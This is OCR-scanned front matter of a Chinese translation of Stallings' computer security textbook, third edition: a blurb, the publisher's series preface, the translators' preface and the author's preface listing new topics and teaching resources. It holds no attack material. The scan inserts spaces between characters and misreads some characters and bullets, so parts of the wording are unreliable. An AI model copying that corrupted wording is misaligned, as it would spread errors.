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本 书 系统 地 介绍 了 计算 机 安全 领域 中 的 各 个 方面 ， 全 面 分 析 了 计算 机 安全 威胁 、 检 测 与 防范 安全 攻击 的 
技术 方法 以 及 软件 安全 问题 和 管理 问题 ， 并 反映 了 计算 机 安全 领域 的 最 新 发 展 状况 和 趋势 。 本 书 重点 介绍 核心 
原理 ,解释 了 这 些 原理 是 如 何 将 计算 机 安全 领域 统一 成 一 体 的 ， 并 说 明了 它们 在 实际 系统 和 网 络 中 的 应 用 。 此 
外 ， 本 书 还 探讨 了 满足 安全 需求 的 各 种 设计 方法 ， 阐 释 了 对 于 当前 安全 解决 方案 至 关 重 要 的 标准 。 

本 书 思路 清晰 ， 结 构 严 说， 并且 提供 了 扩展 的 教学 支持 一 数 百 个 精心 设计 的 实践 问题 ， 是 高 等 院 校 计算 
机 安全 专业 的 理想 教材 ， 同 时 也 可 作为 研究 人 员 和 专业 技术 人 员 的 非常 有 价值 的 参考 书 。 


本 书 主要 内 容 


安全 技术 和 原理 ， 包 括 密码 编码 技术 、 认 证 以 及 访问 控制 。 

e 威胁 及 其 对 策 ， 从 检测 入 侵 者 到 应 对 DoS 攻 击 。 

e 可 信 计 算 与 多 级 安全 。 

安全 软件 : 避免 缓冲 区 溢出 、 恶 意 输入 和 其 他 弱点 。 

管理 安全 : 物理 安全 、 培 训 、 审 计 和 策略 等 。 

e 风险 分 析 、 评 估 及 处 置 方法 ， 并 分 析 真 实 的 案例 。 

计算 机 犯罪 、 知 识 产权 、 隐 私 和 道德 。 

e 密码 算法 ， 包 括 公 钥 密码 体制 。 

网 络 安全 : SSL、TLS、IP 安 全 、S/MIME、Kerberos、X.509 以 及 联合 身份 管理 。 
e 无 线 网 络 安全 、 威 胁 和 防护 措施 。 
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本 书 系统 介绍 计算 机 安全 领域 中 的 各 个 方面 ， 不 但 包括 相关 的 技术 和 应 用 方面 的 内 容 ， 而 且 还 包括 
管理 方面 的 内 容 。 本 书 共 分 五 个 部 分 : 第 一 部 分 “计算 机 安全 技术 与 原理 ”， 涵 盖 了 支持 有 效 安全 策略 
所 必需 的 所 有 技术 领域 ， 第 二 部 分 “软件 安全 与 可 信 系统 "”， 主 要 涉及 软件 开发 和 运行 带 来 的 安全 问题 
及 相应 的 对 策 ; 第 三 部 分 “管理 问题 "， 主 要 讨论 了 信息 安全 与 计算 机 安全 在 管理 方面 的 问题 ， 以 及 与 
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标准 及 无 线 网 络 安全 等 问题 。 此 外 ， 各 章 后 面 都 有 一 定数 量 的 习题 和 复习 题 供 读者 练习 ， 以 加 深 对 书 中 
内 容 的 理解 。 同 时 ， 各 章 后 面 还 附 上 了 一 些 极 有 价值 的 推荐 读物 。 

本 书 黎 盖 面 广 ， 叙 述 清晰 ， 可 作为 高 等 院 校 计算 机 安全 课程 的 教材 ， 同 时 也 是 一 本 有 关 密 码 学 和 计 
算 机 网 络 安全 方面 的 非常 有 价值 的 参考 书 。 
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文艺 复兴 以 来 ， 源 远 流 长 的 科学 精神 和 逐步 形成 的 学 术 规范 ， 使 西方 国家 在 自然 科学 的 各 
个 领域 取得 了 董 断 性 的 优势 ; 也 正 是 这 样 的 优势 ， 使 美国 在 信息 技术 发 展 的 六 十 多 年 间 名 家 辈 
出 、 独 领 风 骚 。 在 商业 化 的 进程 中 ， 美 国 的 产业 界 与 教育 界 越 来 越 紧密 地 结合 ， 计 算 机 学 科 中 
的 许多 泰山 北斗 同时 身 处 科研 和 教学 的 最 前 线 ， 由 此 而 产生 的 经 典 科学 著作 ， 不 仅 壁 划 了 研究 
的 范畴 ， 还 揭示 了 学 术 的 源 变 ， 既 遵循 学 术 规范 ， 又 自 有 学 者 个 性 ， 其 价值 并 不 会 因 年 月 的 流 
逝 而 减退 。 

近年 ， 在 全 球 信息 化 大 潮 的 推动 下 ， 我 国 的 计算 机 产业 发 展 迅猛 ， 对 专业 人 才 的 需求 日 益 
人 迫切。 这 对 计算 机 教育 界 和 出 版 界 都 既是 机 遇 ， 也 是 挑战 ; 而 专业 教材 的 建设 在 教育 战略 上 显 
得 举足轻重 。 在 我 国信 息 技术 发 展 时 间 较 短 的 现状 下 ， 美 国 等 发 达 国家 在 其 计算 机 科学 发 展 的 
几 十 年 间 积淀 和 发 展 的 经 典 教 材 仍 有 许多 值得 借鉴 之 处 。 因 此 ， 引 进 一 批 国外 优秀 计算 机 教材 
将 对 我 国 计 算 机 教育 事业 的 发 展 起 到 积极 的 推动 作用 ， 也 是 与 世界 接轨 、 建 设 真正 的 世界 一 流 
大 学 的 必由之路 。 

机 械 工业 出 版 社 华章 公司 较 早 意识 到 “出 版 要 为 教育 服务 ” 。 自 1998 年 开始 ， 我 们 
就 将 工作 重点 放 在 了 六 选 、 移 译 国 外 优秀 教材 上 。 经 过 多 年 的 不 懈 努 力 ， 我 们 与 Pearson， 
McGraw-Hill, Elsevier, MIT, John Wiley & Sons, Cengage 等 世界 著名 出 版 公司 建立 了 良好 的 
合作 关系 , 从 他 们 现 有 的 数 百 种 教材 中 甄选 出 Andrew S. Tanenbaum, Bjarne Stroustrup, Brain 
W. Kernighan, Dennis Ritchie, Jim Gray, Afred V. Aho, John E. Hopcroft, Jeffrey D. Ullman, 
Abraham Silberschatz, William Stallings, Donald E. Knuth, John L. Hennessy, Larry L. Peterson 
等 大 师 名 家 的 一 批 经 典 作 品 ， 以 “计算 机 科学 丛书 ”为 总 称 出 版 ， 供 读者 学 习 、 研 究 及 珍藏 。 
大 理 石 纹理 的 封面 ， 也 正体 现 了 这 套 丛 书 的 品位 和 格调 。 

“计算 机 科学 丛书 ”的 出 版 工作 得 到 了 国内 外 学 者 的 易 力 相助 ， 国 内 的 专家 不 仅 提供 了 中 
肯 的 选 题 指导 ， 还 不 辞 劳苦 地 担任 了 翻译 和 审 校 的 工作 ; 而 原 书 的 作者 也 相当 关注 其 作品 在 中 
国 的 传播 ， 有 的 还 专门 为 其 书 的 中 译本 作 序 。 迄 今 , “计算 机 科学 丛书 ”已 经 出 版 了 近 两 百 个 
品种 ， 这 些 书籍 在 读者 中 树立 了 良好 的 口碑 ， 并 被 许多 高 校 采 用 为 正式 教材 和 参考 书籍 。 其 影 
印 版 “经 典 原 版 书库 ”作为 姊妹 篇 也 被 越 来 越 多 实施 双语 教学 的 学 校 所 采用 。 

权威 的 作者 、 经 典 的 教材 、 一 流 的 译 者 、 严 格 的 审 校 、 精 细 的 编辑 ， 这 些 因 素 使 我 们 的 图 
书 有 了 质量 的 保证 。 随 着 计算 机 科学 与 技术 专业 学 科 建 设 的 不 断 完善 和 教材 改革 的 逐渐 深化 ， 
教育 界 对 国外 计算 机 教材 的 需求 和 应 用 都 将 步 人 一 个 新 的 阶段 ， 我 们 的 目标 是 尽善尽美 ， 而 反 
馈 的 意见 正 是 我 们 达到 这 一 终极 目标 的 重要 帮助 。 华 章 公司 欢迎 老师 和 读者 对 我 们 的 工作 提出 
建议 或 给 予 指正 ,我 们 的 联系 方法 如 下 : 


华章 网 站 : www.hzbook.com ee 
电子 邮件 : hzjsj@hzbook.com = E 
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在 全 球 信 息 化 大 潮 的 推动 下， 计算 机 与 网 络 技术 迅速 发 展 起 来 并 得 到 广泛 的 应 用 ， 而 今 
已 经 渗透 到 了 整个 社会 的 各 个 领域 ， 从 根本 上 改变 了 人 们 的 生活 和 工作 方式 ， 人 们 对 计算 机 和 
网 络 的 依赖 程度 日 益 增强 。 与 此 同时 ， 由 于 计算 机 在 政治 、 经 济 和 国防 等 国家 关键 领域 中 的 应 
用 ,使 得 计算 机 安全 问题 越 来 越 受到 人 们 的 关注 。 计 算 机 信息 系统 的 脆弱 性 ， 必 然 会 导致 信息 
化 社会 的 脆弱 性 。 目 前 世界 各 国 计 算 机 犯罪 案件 的 不 断 增 加 ， 就 充分 说 明了 计算 机 安全 问题 的 
严重 性 。 因 此 ， 人 们 对 教育 中 计算 机 安全 及 相关 主题 的 关注 程度 与 日 俱 增 。 计 算 机 安全 理论 和 
技术 已 经 成 为 信息 科学 与 技术 中 极为 重要 的 研究 领域 之 一 。 

为 了 满足 教育 中 人 们 对 计算 机 安全 知识 的 需求 ， 近 年 来 国内 出 版 了 许多 有 关 密 码 学 、 计 算 
机 网 络 安全 和 计算 机 系统 方面 的 专业 书籍 、 教 材 和 科普 读物 等 ， 特 别 是 随 着 许多 高 校 中 信息 安 
全 专业 的 创建 ， 国 内 还 出 版 了 多 套 信息 安全 专业 教材 系列 从 书 。 这 无 疑 对 计算 机 安全 教育 起 到 
了 非常 重要 的 作用 。 但 很 少 有 这 样 的 一 本 参考 书 : 它 完 全 涵盖 计算 机 安全 的 各 个 领域 ， 不 但 包 
括 相 关 的 技术 和 应 用 方面 的 内 容 ， 同 时 还 包含 管理 方面 的 内 容 ， 使 得 任何 一 个 从 事 计算 机 安全 
领域 研究 和 学 习 的 人 都 能 从 中 获取 自己 关心 的 知识 ; 它 深 入 浅 出 ， 无 论 是 初 涉 计算 机 安全 领域 
的 学 生 ， 还 是 专业 技术 人 员 或 者 学 术 研究 人 员 ， 通 过 阅读 都 会 受益 匪 浅 ; 它 内 容 新 ， 反 映 了 计 
算 机 安全 领域 技术 与 管理 的 发 展现 状 。 本 书 就 是 这 样 一 本 具备 了 上 述 特点 的 非常 有 价值 的 参考 
书 ， 你 也 可 以 精 选 其 中 的 内 容 作为 教材 使 用 。 

很 多 阅读 过 计算 机 数据 通信 与 网 络 领域 相关 书籍 的 读者 ， 可 能 早已 知道 了 威廉 . 斯 托 林 
斯 (William Stallings) 的 名 字 ， 本 书 是 威廉 斯 托 林 斯 的 又 一 力作 。 威 廉 . 斯 托 林 斯 早年 获 
得 了 麻 省 理工 学 院 计算 机 科学 博士 学 位 。 他 是 世界 知名 计算 机 学 者 和 畅销 教材 作者 ， 已 经 扎 
BT 18 部 著作 ， 出 版 了 70 多 本 书籍 ， 内 容 涉及 计算 机 安全 、 计 算 机 网 络 和 计算 机 体系 结构 
等 领域 ， 堪 称 计 算 机 界 的 全 才 。 在 过 去 的 30 多 年 中 ,. 威廉 ' 斯 托 林 斯 博士 曾经 多 次 获得 由 美 
国 “教材 和 学 术 专 著作 者 协会 ”颁发 的 “年 度 最 佳 计算 机 科学 教材 ” 奖 。 目 前 ,威廉 . 斯 托 
林 斯 博士 还 创建 并 维护 着 计算 机 科学 学 生 资 源 网 站 (Computer Science Student Resource Site) 
ComputerScienceStudent.com。 这 个 网 站 为 学 习 计算 机 科学 的 学 生 以 及 专业 技术 人 员 提 供 了 他 
们 感 兴趣 的 各 种 主题 的 相关 文档 和 链接 ， 供 学 生 在 学 习 和 研究 过 程 中 参考 。 

本 书 的 特点 是 内 容 详 尽 、 覆 盖 面 广 ， 阐 述 条 理 清晰 、 深 入 浅 出 、 易 于 理解 ， 系 统 地 概览 了 
计算 机 安全 领域 的 最 新 发 展 状况 和 趋势 。 通 过 阅读 本 书 ， 读 者 可 以 全 面 深 入 地 了 解 计算 机 安全 
领域 中 涉及 的 绝 大 部 分 知识 。 

本 书 第 3 版 在 第 1 版 和 第 2 版 的 基础 上 对 内 容 进 行 了 修订 ， 特 别 补充 了 计算 机 安全 领域 的 
新 进展 和 新 技术 ， 并 对 前 两 版 的 内 容 进 行 了 优化 ， 使 内 容 更 为 系统 和 紧凑 ， 更 适合 读者 阅读 或 
参考 。 

全 书 共 包含 以 下 五 个 部 分 : 第 一 部 分 “计算 机 安全 技术 与 原理 "， 涵 盖 了 支持 有 效 安全 
策略 所 必需 的 所 有 技术 领域 ; 第 二 部 分 “软件 安全 与 可 信 系 统 ”， 主 要 涉及 软件 开发 和 运行 
带 来 的 安全 问题 及 相应 的 对 策 ; 第 三 部 分 “管理 问题 "， 主 要 讨论 了 信息 安全 与 计算 机 安全 在 
管理 方面 的 问题 ， 以 及 与 计算 机 安全 相关 的 法 律 和 道德 方面 的 问题 ， 第 四 部 分 “密码 编码 算 
法 ”， 包 括 各 种 类 型 的 加 密 算法 和 其 他 类 型 的 密码 算法 ; 第 五 部 分 “网 络 安 全 ”， 关 注 的 是 为 在 
Internet 上 进行 通信 提供 安全 保障 的 协议 和 标准 及 无 线 网 络 安 全 等 问题 。 此 外 ， 各 章 后 面 都 有 


一 定数 量 的 习题 和 复习 题 供 读者 练习 ， 以 加 深 对 书 中 内 容 的 理解 。 同 时 ， 各 章 后 面 还 附 上 了 一 
些 极 有 价值 的 参考 文献 ， 利 用 这 些 资 源 ， 有 兴趣 的 读者 可 以 进一步 对 计算 机 安全 方面 的 一 些 技 
术 细节 进行 深入 学 习 和 研究 。 

本 书 由 页 春 福 和 高 敏 芬 组 织 翻译 ， 参 加 翻译 的 人 员 还 包括 刘 春 波 、 李 同 、 宗 楠 、 马 匡 玉 、 
刘露 、 梁 磷 、 陈 在 、 杨 骏 、 蔡 亚运 等 。 王 晓 初 、 黄 志 月 、 吕 童 童 和 李 瑞 琪 等 也 参与 了 部 分 翻译 
工作 或 者 校对 工作 。 全 书 最 后 由 页 春 福 和 高 敏 芬 统 稿 和 审 校 。 在 翻译 过 程 中 ， 我 们 对 书 中 出 现 
的 错误 做 了 修正 。 在 本 书 的 翻译 过 程 中 得 到 了 机 械 工 业 出 版 社 华章 公司 温 莉 芳 总 编辑 、 朱 动 纺 
辑 的 关注 和 支持 ， 在 此 表示 感谢 。 

翻译 国外 著名 作家 的 经 典 书籍 是 极 具 挑战 性 的 ， 因 为 经 典 书籍 不 仅 具 有 深度 ， 在 内 容 上 也 
是 各 具 特 色 ， 常 常 是 引经据典 ， 这 对 我 们 的 翻译 工作 产生 了 不 小 的 压力 。 我 们 本 着 对 读者 认真 
负责 的 宗旨 ， 力 求 做 到 技术 内 涵 的 准确 无 误 以 及 专业 术语 的 规范 统一 ， 力 求 达到 “ 信 达 雅 ”的 
翻译 水 准 。 但 是 ， 限 于 译 者 水 平 ， 加 之 时 间 人 仓促， 翻译 不 妥 和 琉 漏 之 处 在 所 难免 ， 敬 请 阅读 本 
书 的 读者 予以 批评 指正 。 


译 者 
于 天 津南 开园 


前 言 | 


Computer Security: Principles and Practice, Third Edition 


第 3 版 新 增 内 容 


自 本 书 第 2 版 出 版 以 来 ， 计 算 机 安全 领域 又 持续 性 地 出 现 了 一 些 改进 和 创新 。 在 新 版 本 
中 ,我 们 试图 展现 这 些 改 进 和 创新 ， 同 时 ， 力 求 在 深度 和 广度 上 涵盖 整个 计算 机 安全 领域 。 在 
第 3 版 修订 之 初 ， 许多 讲授 该 领域 课程 的 教授 和 从 事 该 领域 工作 的 专业 人 士 又 重新 仔细 地 审查 
了 本 书 的 第 2 版 。 第 3 版 修订 和 完善 了 其 中 多 处 描述 ， 并 对 相关 的 图 表 也 进行 了 改进 。 

除了 这 些 适用 于 教学 和 便于 阅读 方面 的 改进 外 ， 本 书 也 对 一 些 实质 性 的 内 容 进行 了 修订 。 
下 面 列 出 的 是 其 中 一 些 最 显著 的 修订 : 


背景 


基本 安全 设计 原则 : 第 1 章 新 增加 了 一 节 有 关 基 本 安全 设计 原则 的 内 容 ， 这 一 原则 被 
美国 国家 安全 局 和 美国 国土 安全 部 联合 创建 的 信息 保障 /网 络 防御 国 家 卓越 学 术 中 心 
(National Center of Excellence in Information Assurance/Cyber Defense) 列 为 基本 原则 。 
攻击 面 (attack surface) 和 攻击 树 (attack tree): 第 1 章 新 增 一 节 来 描述 这 两 个 概念 ， 这 
对 于 评估 和 分 类 安全 威胁 具有 非常 重要 的 作用 。 

用 户 认证 模型 : 第 3 章 新 增 一 个 小 节 用 于 描述 用 户 认证 的 一 般 模型 ， 这 有 利于 统一 探 
讨 用 户 认 证 的 不 同方 法 。 

基于 属性 的 访问 控制 (ABAC): 第 4 章 新 增 了 一 节 关 于 日 益 普及 的 基于 属性 的 访问 控 
制 的 内 容 。 

身份 、 和 凭证 和 访问 管理 (ICAM): 第 4 章 新 增 一 节 关 于 ICAM 的 内 容 ， 这 是 管理 和 应 
用 数字 身份 (和 相关 属性 )、 证 书 和 访问 控制 的 综合 方案 。 

信任 框架 : 第 4 章 新 增 一 节 关 于 开放 式 身 份 信任 框架 的 内 容 ， 这 是 一 种 用 于 值得 信任 
的 身份 和 属性 交换 的 开放 式 和 标准 化 的 方法 ， 该 方法 正 得 到 广泛 的 应 用 。 

SQL 注入 攻击 : 第 5 章 增添 了 一 节 关 于 SQL 注入 攻击 的 内 容 ，SQL 注入 攻击 是 最 为 
流行 、 最 为 危险 的 基于 网 络 的 安全 威胁 方式 之 一 。 

BRE: 对 第 5 章 关 于 云 安全 的 内 容 进 行 了 修正 ， 并 扩展 了 反映 其 重要 性 和 近期 进展 
的 内 容 。 

恶意 软件 : 调整 恶意 软件 的 内 容 和 人 侵 者 的 分 类 ， 使 其 能 够 反映 恶意 软件 最 新 的 发 展 ， 
包括 高 级 持续 性 威胁 (APT)， 它 已 引起 了 国家 层面 的 高 度 重视 。 

入 侵 检 测 / 入 侵 防 护 系 统 : 修改 了 关于 IDS/IPS 的 内 容 以 反映 该 领域 的 新 进展 ， 包 括 协 
助 实现 深度 防护 策略 的 基于 主机 的 人 侵 检测 系统 的 最 新 研究 进展 。 

人 力 资源 : 由 于 人 为 因素 和 社会 工程 导致 的 安全 丧失 逐渐 成 为 人 们 关注 的 内 容 ， 包 括 
几 个 近期 发 生 的 由 内 部 人 员 引 起 的 大 量 数据 渗 漏 案例 ， 用 以 强调 说 明 这 些 安全 丧失 问 
题 需要 程序 上 和 技术 控制 方面 的 融合 来 解决 。 而 这 些 内 容 在 几 个 重要 的 小 节 都 有 阐述 。 
移动 设备 安全 : 移动 设备 安全 已 成 为 企业 网 络 安 全 的 重要 方面 ， 尤 其 是 那些 被 称 为 “ 自 
带 设备 "(BYOD) 的 一 类 设备 。 第 24 章 用 了 新 的 一 节 阐 述 了 这 些 重 要 的 内 容 。 

SHA-3: 这 一 最 近 被 采用 的 密码 编码 散 列 标准 被 安排 在 了 附录 中 。 


近年 来 ， 人们 在 高 等 教育 中 对 计算 机 安全 及 相关 主题 的 关注 程度 与 日 俱 增 。 导 致 这 一 状况 


vil 


的 因素 很 多 ， 以 下 是 其 中 两 个 突出 的 因素 : 

1. 随 着 信息 系统 、 数 据 库 和 基于 Internet 的 分 布 式 系统 与 通信 广泛 应 用 于 商业 领域 ， 再 加 
上 愈演愈烈 的 各 种 与 安全 相关 的 攻击 ， 各 类 组 织 机 构 开 始 意识 到 必须 拥有 一 个 全 面 的 信息 安全 
策略 。 这 个 策略 包括 使 用 特定 的 软 硬 件 和 培训 专业 人 员 等 。 

2. 计算 机 安全 教育 ， 也 就 是 通常 所 说 的 信息 安全 教育 (Information Security Education) 或 
者 信息 保障 教育 ( Information Assurance Education)， 由 于 与 国防 和 国土 安全 密切 相关 ， 在 美国 
和 其 他 许多 国家 已 经 成 为 一 个 国家 目标 。NSA/DHS 信息 保障 /网 络 防御 国家 卓越 学 术 中 心 以 
政府 的 身份 负责 计算 机 安全 教育 标准 的 制定 。 

由 此 可 预见 ， 关 于 计算 机 安全 的 课程 在 未 来 的 大 学 、 社 区 学 院 和 其 他 与 计算 机 安全 及 相关 
领域 相关 的 教育 机 构 中 会 越 来 越 多 。 


目标 
本 书 的 目标 是 概览 计算 机 安全 领域 的 最 新 发 展 状况 。 计 算 机 安全 设计 者 和 安全 管理 者 面临 
的 中 心 问题 主要 包括 : 定义 计算 机 和 网 络 系统 面临 的 威胁 ， 评 估 这 些 威胁 可 能 导致 的 风险 ， 以 
及 制定 应 对 这 些 威 胁 的 恰当 的 、 便 于 使 用 的 策略 。 
本 书 将 就 以 下 主题 进行 讨论 : 
。 原理 : 虽然 本 书 涉 及 的 范围 很 广 ， 但 有 一 些 基本 原理 会 重复 出 现在 一 些 领域 中 ， 比 如 ， 
有 关 认 证 和 访问 控制 的 原理 。 本 书 重点 介绍 了 这 些 原理 并 且 探 讨 了 这 些 原理 在 计算 机 
安全 的 一 些 特殊 领域 中 的 应 用 。 
© 设计 方法 : 本 书 探讨 了 多 种 满足 某 一 特定 方面 的 计算 机 安全 需求 的 方法 。 
。 标准 : 在 计算 机 安全 领域 中 ， 标 准将 越 来 越 重 要 ， 甚 至 会 处 于 主导 地 位 。 要 想 对 某 
项 技术 当前 的 状况 和 未 来 的 发 展 趋势 有 正确 的 认识 ， 需 要 充分 理解 与 该 项 技术 相关 的 
标准 。 
e 实例 : 书 中 的 许多 章 中 都 包含 一 节 来 展示 相关 原理 在 真实 环境 中 的 应 用 情况 。 


对 ACM/IEEE 计算 机 科学 课程 2013 的 支持 


本 书 是 为 学 术 研 究 人 员 和 专业 技术 人 员 编 写 的 。 作 为 教科 书 ， 它 面向 的 对 象 主要 是 计算 
机 科学 、 计 算 机 工程 和 电子 工程 专业 的 本 科 生 ， 授 课时 间 可 以 是 一 或 两 个 学 期 。 本 书 第 3 版 的 
设计 目标 是 支持 ACM/IEEE 计算 机 科学 课程 2013 (CS2013 ) 推荐 的 内 容 。CS2013 课程 推荐 的 
内 容 首次 包含 了 信息 保障 和 安全 (IAS)， 将 其 作为 知识 领域 列 人 了 计算 机 科学 知识 体系 之 中 。 
CS2013 将 所 有 需要 讲授 的 课程 内 容 分 为 三 类 : 核心 1 级 (Core-Tier 1 )( 所 有 的 主题 都 应 涵盖 在 
课程 体系 中 )， 核 心 2 级 (Core-Tier 2) (全 部 或 大 部 分 主题 应 当 包 含 在 课程 体系 中 )， 选 修 内 容 
(具有 一 定 广度 和 深度 的 选修 主题 )。 在 IAS 领域 中 ，CS2013 包含 了 3 个 核心 1 级 的 主题 、5 
个 核心 2 级 的 主题 和 许多 选修 主题 ， 每 一 个 主题 召 包 合 一 些 于 主题 。 本 书包 合 了 CS2013 的 六 
心 1 级 和 核心 2 级 的 全 部 内 容 ， 同 时 也 包含 了 CS2013 的 许多 选修 主题 。 

详 见 第 0 章 有 关 本 书 涵盖 CS2013 HAF. 


覆盖 CISSP 科目 领域 情况 


本 书 涵盖 了 CISSP (注册 信息 系统 安全 师 ) 认证 所 规定 的 所 有 科目 领域 。 国 际 信息 系统 
安全 认证 协会 (ISC) :所 设立 的 CISSP 认证 被 认为 是 信息 安全 领域 认证 中 的 “黄金 准则 ”。 
CISSP 认证 是 安全 产业 唯一 一 个 被 广泛 认可 的 认证 。 包 括 美国 国防 部 和 许多 金融 机 构 在 内 的 组 
织 机 构 ， 时 下 都 要 求 其 网 络 安全 部 门 的 人 员 具 有 CISSP 认证 资格 。2004 年 ，CISSP 成 为 首 个 


获取 ISO/IEC 17024 ( General Requirements for Bodies Operating Certification of Persons) 官方 认 
证 的 信息 技术 项 目 。 

CISSP 考试 基于 公共 知识 体系 ( CBK)， 信 息 安 全 实践 大 纲 由 国际 信息 系统 安全 认证 协会 
(CISC) “开发 和 维护 ， 这 是 一 个 非 营利 组 织 。CBK 制定 了 组 成 CISSP 认证 要 求 的 知识 体系 的 10 
个 领域 。 有 关 本 书 涵盖 CBK 的 详细 情况 ， 请 参见 第 0 章 。 


本 书 内 容 


本 书 分 为 五 个 部 分 (具体 情况 见 第 0 章 ): 

© 计算 机 安全 技术 与 原理 

e 软件 安全 与 可 信 系 统 

e 管理 问题 

。 密码 编码 算法 

e 网 络 安全 

本 书 还 配 有 一 些 在 线 章节 和 附录 ,介绍 一 些 选 定 的 主题 。 

本 书 附 有 常用 的 缩 略语 表 和 参考 文献 。 此 外 ， 每 章 均 包括 习题 、 复 习题 和 关键 术语 表 以 及 
推荐 读物 。 


教学 辅助 材料 ” 


本 书 的 主要 目标 是 尽 可 能 地 为 令 人 兴奋 的 、 高 速 发 展 的 信息 安全 学 科 提供 一 个 有 效 的 教学 
工具 。 这 一 目标 不 仅 体 现在 本 书 的 组 织 结构 上 ， 也 体现 在 教学 辅助 材料 上 。 本 书 提供 了 以 下 补 
充 资料 ， 以 便 教师 组 织 教学 工作 。 

© 项 目 手册 (Projects manual): 项 目 手册 包括 文档 和 便于 使 用 的 软件 ， 以 及 后 续 列 出 的 为 

每 类 项 目 推荐 的 项 目 任务 。 

© 解决 方案 手册 (Solutions manual)， 每 章 章 末 的 复习 题 和 习题 的 答案 或 解决 方案 。 

© PPT 幻灯 片 (PowerPoint slides): 涵盖 本 书 所 有 章节 的 幻灯 片 ， 适 合 在 教学 中 使 用 。 

e PDF 文件 (PDF files): 本 书 中 所 有 的 图 片 和 表格 。 

e 练习 库 〈Test bank): 每 章 都 有 一 组 用 于 练习 的 问题 。 

© 教学 大 纲 样 例 (Sample syllabuses): 本 书包 含 的 内 容 超出 了 一 学 期 所 能 讲授 的 内 容 。 为 

此 ， 本 书 提 供 了 一 些 教学 大 纲 样 例 ， 目 的 是 为 教师 在 有 限时 间 内 使 用 本 书 提供 建议 ， 
这 些 样 例 都 是 基于 教授 使 用 本 书 第 1 版 的 真实 教学 经 历 给 出 的 。 

所 有 教 辅 材料 都 可 以 在 本 书 的 教师 资源 中 心 (Instructor Resource Center, IRC) 获得 ， 可 以 
通过 出 版 商 网 站 www.pearsonhighered.com/stallings 或 者 点 击 本 书 的 网 站 WilliamStallings.com/ 
ComputerSecurity 中 的 Pearson Resources for Instructors 链接 获得 。 

另外 ， 本 书 的 Web 站 点 WilliamStallings.com/ComputerSecurity (点 击 Instructor Resources 
链接 ) 还 为 教师 提供 了 下 列 支 持 : 

© 使 用 本 书 讲授 其 他 课程 的 网 络 链接 信息 。 

© 提供 给 使 用 本 书 教师 的 Internet 邮箱 列表 的 签名 信息 ， 这 使 得 使 用 本 书 的 教师 之 间 、 教 

师 与 本 书 作 者 之 间 可 以 交换 信息 ， 交 流 对 本 书 的 建议 ， 探 讨 其 中 的 问题 等 。 


O 关于 本 书 教 辅 资 源 ， 用 书 教师 可 向 培 生 教育 出 版 集团 北京 代表 处 申请 ， 电 话 : 010-5735 5169/5735 5171, 电 
子 邮件 : service.cn@pearson.com。 一 一 编辑 注 


学 生 资源 
在 第 3 版 中 ， 大 量 的 面向 学 生 的 原始 辅助 材料 都 可 以 在 两 个 网 站 上 获取 。 本 书 的 配套 网 站 
WilliamStallings.com/ComputerSecurity (点 击 StudentResources 链接 ) 中 包括 一 系列 按 章节 组 织 
的 相关 链接 ， 以 及 本 书 的 勘误 表 。 
Premium Content 站 点 包含 了 如 下 资料 S: 
o 在 线 章节 (Online chapters): 为 了 控制 本 书 的 内 容 容 量 和 销售 价格 ， 本 书 有 两 章 内 容 以 
PDF 文件 的 形式 提供 。 这 些 章节 已 在 本 书 的 目录 中 列 出 。 
© 在 线 附 录 (Online appendices): 本 书 教学 辅助 资料 中 引用 了 大 量 有 趣 的 主题 ， 但 在 印 
刷 版 中 没有 详细 地 展开 。 为 此 ， 我 们 为 感 兴趣 的 学 生 提供 了 有 关 这 些 主题 的 9 个 附录 ， 
这 些 附录 也 在 本 书 的 目录 中 列 出 。 
e 课 后 问题 及 答案 (Homework problems and solutions): 提供 了 一 组 独立 的 课 后 问题 并 配 
有 答案 ,便于 学 生 检 查 自己 对 课本 内 容 理 解 的 情况 。 


项 目 和 其 他 学 生 练 习 


对 许多 教师 来 说 ， 计 算 机 安全 课程 的 一 个 重要 组 成 部 分 是 一 个 项 目 或 一 组 项 目 。 通 过 这 些 
可 以 自己 动手 实践 的 项 目 ， 学 生 可 以 更 好 地 理解 课本 中 的 概念 。 本 书 对 项 目的 组 件 提 供 了 不 同 
程度 的 支持 。 教 学 辅助 材料 不 仅 包括 如 何 构思 和 指定 这 些 项 目 ， 而 且 还 包含 不 同 项 目 类 型 及 作 
业 的 用 户 手册 。 这 些 都 是 专门 为 本 书 设计 的 。 教 师 可 以 按照 以 下 分 类 布置 作业 : 
o 黑客 练习 (Hacking exercises); 有 两 个 项 目 可 以 帮助 学 生理 解 人 侵 检测 和 入 侵 防 御 。 
e 实验 室 练习 (Laboratory exercises): 一 系列 涉及 编程 和 书 中 概念 训练 的 项 目 。 
安全 教育 项 目 ( Security education(SEED) projects): 一 系列 动手 练习 或 实验 ， 涵 盖 了 安 
全 领域 广泛 的 主题 。 
研究 项 目 (Research projects): 一 系列 研究 型 作业 ， 引 导 学 生 就 Internet 的 某 个 特定 主 
题 进行 研究 并 撰写 一 份 报告 。 
编程 项 目 (Programming projects): 涵盖 广泛 主题 的 一 系列 编程 项 目 。 这 些 项 目 都 可 以 
用 任何 语言 在 任何 平台 上 实现 。 
实用 安全 评估 ( Practical security assessments) : 一 组 分 析 当 前 基础 设施 和 现 有 机 构 安全 
性 的 实践 活动 。 
防火 墙 项 目 (Firewall projects): 提供 了 一 个 可 移植 的 网 络 防火 墙 可 视 化 模拟 程序 ， 以 
及 防火 墙 原理 教学 的 相关 练习 。 
案例 分 析 ( Case studies): 一 系列 现实 生活 中 的 案例 ， 包 括 学 习 目 标 、 案 例 简介 和 一 系 
列 案例 研讨 问题 。 
e 阅读 /报告 作业 (Reading/report assignment): 一 组 论文 清单 ， 可 以 分 配给 学 生 阅 读 ， 要 
求学 生 阅读 后 写 出 相应 的 报告 ， 此 外 还 有 与 教师 布置 作业 相关 的 内 容 。 
e 写作 作业 (Writing assignment): 一 系列 写作 方面 的 练习 ， 用 于 加 强 对 书 中 内 容 的 理解 。 
e 计算 机 安全 教学 网 络 广播 (Webcasts for teaching computer security) : 为 强化 课程 ， 提 供 
了 网 络 广播 地 址 目录 。 使 用 该 目录 的 高 效 方法 是 选取 或 者 允许 学 生 选 取 一 个 或 几 个 视 
频 观看 ， 然 后 写 一 篇 关于 该 视频 的 报告 或 分 析 。 
这 一 整套 不 同 的 项 目 和 其 他 学 生 练习 ， 不 仅 是 本 书 的 丰富 多 彩 学 习 体 验 的 一 部 分 ， 而 且 从 


日” 如 需要 这 部 分 付费 内 容 ， 读 者 可 联系 培 生 教育 出 版 集团 北京 代表 处 购买 ， 电 话 : 010-5735 5169/5735 5171, 
电子 邮件 : service.cn@pearson.com。 一 一 编辑 注 


